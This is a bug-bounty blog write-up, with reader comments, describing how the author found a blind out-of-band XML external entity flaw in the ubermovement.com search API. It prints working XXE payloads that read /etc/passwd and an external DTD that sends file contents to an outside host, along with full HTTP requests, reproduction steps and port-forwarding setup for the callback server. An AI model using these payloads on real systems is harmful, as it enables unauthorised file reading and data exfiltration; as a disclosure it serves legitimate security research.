Blind OOB XXE At UBER 26+ Domains Hacked.

XXE (XML External Entity) :
An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.

This is the story of how I was able to find XXE in one of the UBER'S Website that was in Bug Bounty Program Scope.

On July 26th 2016 Evening I was working on domain ubermovement Web Application.
As it was a small webapp there were no too much parameter to run injections tests. I started the old school tests and the first parameter I came across was the Search Box.


Now, I Attached my Burp Suite then gave a keyword to search and started monitoring the requests...

In Directory "search" I got two requests.
1.The Keyword I searched : http://ubermovement.com/api/search/GeneralSearch?crumb=ASmuamNBJiP4eyC3qpXZWu87i5X6PWGh&q=cat&p=0
2. http://ubermovement.com/api/search/GeneralSearch


Now , For the first request I started the attacks like XSS, SQL, XPATH, XXE, command injections many more.....

But they all failed and I didn't find any vulnerability.

Now I started my tests with second request...

As there were no parameters so, I Send the request to Repeater and started looking for Directory Based Vulnerabilities.

 
Then, As my all other Injection tests failed lastly I started looking for XXE.

So, First thing I does to change the Request Method to POST and check the response.



As the Response was same as GET Request so I Added the Content-type Header as application/xml
and basic XML Code with "GeneralSearch" as search parameter then checked for Response.
<?xml version="1.0" encoding="utf-8"?>
<GeneralSearch>cat</GeneralSearch>


The Response was shocking as I got the XML Error.

Now I was about 60% sure that it could lead to XXE. SO, I started the Blind Test for XXE...
with different payloads...
Eg.

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE dtgmlf6 [ <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<GeneralSearch>&xxe;</GeneralSearch>

But Still no luck all I was getting the XML Error in response....

Now, I thought lets check the vulnerability via OOB (Out-of-band) Method and perform a Ping Test.

So,
step-1 : I downloaded XAMPP and hosted a Apache Server.
step-2 : I Port forward my IP to port 80 so I can access my server via my Public IP from different networks.
step-3 : I Edited XXE Payload to :

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE dtgmlf6 [ <!ENTITY dtgmlf6ent SYSTEM "http://0.0.0.0/">
]>
<GeneralSearch>&dtgmlf6ent;</GeneralSearch> 

step-4 : Started the attack and got the error.


step-5 : I checked my server logs and I got a perfect ping from vulnerable application.




Now, the manual test confirms the vulnerability so I scanned the particular vulnerable request via Acunetix and it detected the vulnerability.


 
Then I Report the Bug First and then started doing further tests with .dtd payloads.

Its turn out to be the various sub-domain for .*ubermovement.com was having the same flaw.

Google Dork : site:ubermovement.com "/search/"



Original HackerOne Report #154096

Test Summary :

POST data was set to <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE dtgmlf6 [ <!ENTITY dtgmlf6ent SYSTEM "http://0.0.0.0/"> ]> <GeneralSearch>&dtgmlf6ent;</GeneralSearch>
An HTTP request was initiated for the domain http://0.0.0.0/ which indicates that this script is vulnerable to XXE injection.
NOTE : As it was Blind XXE Test I was Successful in Ping Test for XXE. But unable to retrieve any sensitive information.

HTTP request details:

IP address: 8.36.86.67
User agent: Java/1.8.0_60

Vulnerable Domain :

Vulnerable Link :

Vulnerable Parameter :

GeneralSearch

Steps To Reproduce :

  1. Go to website : http://ubermovement.com/
  2. Attach burp Suite & start intercepting now, click on search and search...
  3. Grab the GET request

    Eg. Original HTTP Request :

    GET /api/search/GeneralSearch HTTP/1.1
    Host: ubermovement.com
    Accept: /
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
  4. NOW,
Send request to repeater & change it to POST.

Eg. Original HTTP Request :

POST /api/search/GeneralSearch HTTP/1.1
Host: ubermovement.com
Content-Length: 173
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: /
  1. Now Add content type : Eg. Content-type: application/xml

Request will be:

POST /api/search/GeneralSearch HTTP/1.1
Content-type: application/xml
Host: ubermovement.com
Content-Length: 173
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: /
  1. Deploy web server and host "payload.dtd" File eg :

    payload.dtd :

    <?xml version="1.0" encoding="UTF-8"?>
    <!ENTITY % all "<!ENTITY send SYSTEM 'http://xxe.me/content?%file;'>">
    %all;
  2. Now Add XXE Payload For confirmation :
    <?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE roottag [ 
    <!ENTITY % file SYSTEM "file:///etc/passwd">
    <!ENTITY % dtd SYSTEM "http://0.0.0.0/payload23.dtd">
    %dtd;]>
    <GeneralSearch>&send;</GeneralSearch>

Request Will Be :

POST /api/search/GeneralSearch HTTP/1.1
Content-type: application/xml
Host: ubermovement.com
Content-Length: 214
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: /
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag [ 
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://0.0.0.0/payload.dtd">
%dtd;]>
<GeneralSearch>&send;</GeneralSearch>
NOTE : If you view your web server logs you will find a 404 error.

Comments

  1. Replies
    1. I hope, next time they will pay more than $500

      Delete
  2. Hey how u forwarded port where u hosted dtd file which is you gave ? Xampp would be running on your local machine than how u get back ping from Uber server to your server I mean which is address you used your public IP ?

    ReplyDelete
    Replies
    1. Steps for port forwarding :
      ---------------------------
      NOTE : Before performing make sure that you can access your Public IP form different networks. To know your public IP go to google search and type "my ip".

      1. Install XAMPP and run Apache Server in your system.
      2. Open Apache Configuration file "C:\xampp\apache\conf\httpd.conf"
      3. Now make a rule "Listen :"
      Eg. Listen 192.168.1.203:80
      Idea is to run your server locally first IP : Should be your local IP
      To Obtain Local IP use command : "Windows":"ipconfig" & "Linux":"ifconfig"
      4. When IP Is set restart the server.
      5. Now open your router.
      NOTE : Maximum Router have advance feature called NAT or Port forwarding or create virtual server. So you have to check for it.
      7. For forwarding PORT :
      Eg. I have Dlink router so,
      a. there was a tab called Port forwarding. click on it.
      b. Choose the task to perform from check list eg. run http server.
      c. Gave the your local IP and port to be forwarded.

      Eg.
      IP:192.168.1.203
      port : 80
      Forward port : 80

      See : http://portforward.com/

      -----------------------------

      You have to host .dtd payload in you local xampp server.

      ------------------------------

      For getting PING back for uber I used my public IP means after port forward process my local server become global so I can use my server from anywhere in the world with help of Public IP. In other words I hosted XAMPP on my public IP so acted like any other website.

      Delete
  3. Can you make video for any other site for xxe or do u have any so we can refer it with Each and every single step ?

    ReplyDelete
  4. Hey how u forwarded port where u hosted dtd file which is you gave ? Xampp would be running on your local machine than how u get back ping from Uber server to your server I mean which is address you used your public IP ?

    ReplyDelete
  5. Sir you have explained very nicely... is there any more bug that u have found and u have posted the steps on blog.. plz give us link.

    ReplyDelete
  6. This comment has been removed by the author.

    ReplyDelete
  7. full functionable, premium wordpress theme solution for your website.
    Affordable Web Hosting Lahore Pakistan

    ReplyDelete
  8. This comment has been removed by the author.

    ReplyDelete
  9. This was the awesome guess. Nice bro!.

    ReplyDelete

Post a Comment

Popular posts from this blog

That Moment When You Find Authentication Bypass Vulnerability In Bug Bounty Program ?

Post XSS At : "research.microsoft.com"